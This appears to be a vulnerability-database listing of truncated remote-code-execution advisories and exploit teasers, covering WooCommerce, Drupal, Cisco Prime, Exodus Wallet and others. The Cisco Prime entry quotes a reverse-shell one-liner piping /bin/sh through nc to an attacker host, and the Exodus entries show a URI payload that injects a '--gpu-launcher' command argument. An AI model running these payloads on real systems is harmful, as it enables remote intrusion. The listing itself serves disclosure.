Automattic: Authenticated Code Execution through Phar deserialization in CSV Importer as Shop manager in WooCommerce

This vulnerability is based on the following exploitation technique: https://blog.ripstech.com/2018/new-php-exploitation-technique/ It is easier to explain this vulnerability by having watched the PoC first: https://www.youtube.com/watch?v=mr3bAOIUwd4 Here is what's happening: 1. Since a valid ph...

CVE-2016-4398

HP Network Node Manager i (NNMi) Software versions 10.00, 10.01 (patch1), 10.01 (patch 2), and 10.10 are affected by a remote arbitrary code execution vulnerability due to Java deserialization. The CVE-2016-4398 weakness enables an attacker to potentially run arbitrary code on a vulnerable host v...

CVE-2018-1000525

OpenPSA is affected by a PHP Object Injection vulnerability in form data passed as GET variables, allowing a crafted GET request to serialize a PHP object and potentially disclose information or achieve remote code execution. The issue arises from unsafe deserialization, enabling arbitrary code e...

Security Bulletin: Multiple Mozilla Firefox vulnerability issues in IBM Storwize V7000 Unified

Summary There are security vulnerabilities in versions of Mozilla Firefox that are shipped with versions 1.5.1.0 to 1.5.2.5 of IBM Storwize V7000 Unified Vulnerability Details IBM Storwize V7000 Unified is shipped with Mozilla Firefox. There are vulnerabilities in certain versions of Mozilla...

Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)

Binary data drupalCVE-2018-7600rce.nbin...

CVE-2018-4088

The CVE-2018-4088 entry maps to memory-corruption flaws in WebKit that could allow remote code execution via crafted web content in Apple platforms. Affected products include iOS before 11.2.5, macOS before 10.13.3, Safari before 11.0.3, iCloud/iTunes on Windows, tvOS before 11.2.5, and watchOS b...

MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014

MS14-066: Vulnerability in SChannel could allow remote code execution: November 11, 2014 INTRODUCTION The update that this article describes has been replaced by a newer update on December 9, 2014. We recommend that you install the most current security update for Windows. To install the most...

Exodus Wallet (ElectronJS Framework) Remote Code Execution

window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...

Exodus Wallet (ElectronJS Framework) - Remote Code Execution

Exodus Wallet ElectronJS Framework - Remote Code Execution window.location = 'exodus://aaaaaaaaa" --gpu-launcher="cmd" --aaaaa='...

Advantech WebAccess webvrpcs drawsrv Untrusted Pointer Dereference Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2780 IOCTL in the webvrpcs process. The issue results...

Out-of-bounds

An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows attackers to execute arbitrary code in a privileged context or cause a denial of service out-of-bounds read via a crafted app...

CVE-2017-0834

A remote code execution vulnerability in the Android media framework libmpeg2. Product: Android. Versions: 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0. Android ID: A-63125953...

Unauthenticated Remote Code Execution Vulnerability

Puppet 2.7.x before 2.7.21 and 3.1.x before 3.1.1, when running Ruby 1.9.3 or later, allows remote attackers to execute arbitrary code via vectors related to "serialized attributes."...

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

OWASPZAP v2.5.0 - Remote Code Execution Vulnerability

Document Title: =============== OWASPZAP v2.5.0 - Remote Code Execution Vulnerability References: =========== https://www.vulnerability-lab.com/getcontent.php?id=2096 Video: https://www.youtube.com/watch?v=41gr2XhSOw Release Date: ============= 2017-09-18 Vulnerability Laboratory ID VL-ID:...

CVE-2017-12481

CVE-2017-12481 affects Ledger 3.1.1, where the find_option function in option.cc can be triggered by a crafted file to cause a stack-based buffer overflow, leading to a denial of service (and potentially other impact). Public documents in the connected set confirm this CVE alongside related ones ...

BestSafe Browser - Man In The Middle Remote Code Execution

Exploit Title: BestSafe Browser FREE NoAds - Remote Code Execution Date: 30/Jun/17 Exploit Author: MaXe Vendor Homepage: https://play.google.com/store/apps/details?id=a1.bestsafebrowser.com Software Link: See APK archive websites Screenshot: Refer to https://www.youtube.com/watch?v=VXNVzjsH0As...

openSUSE: Security Advisory for mercurial (openSUSE-SU-2017:1572-1)

The remote host is missing an update for the Copyright C 2017 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

CVE-2016-8586

detectedpotentialfiles.cgi in Trend Micro Threat Discovery Appliance 2.6.1062r1 and earlier allows remote authenticated users to execute arbitrary code as the root user via shell metacharacters in the cacheid parameter...

Mercurial Custom hg-ssh Wrapper Remote Code Exec

This module takes advantage of custom hg-ssh wrapper implementations that don't adequately validate parameters passed to the hg binary, allowing users to trigger a Python Debugger session, which allows arbitrary Python code execution. This module requires Metasploit: https://metasploit.com/downlo...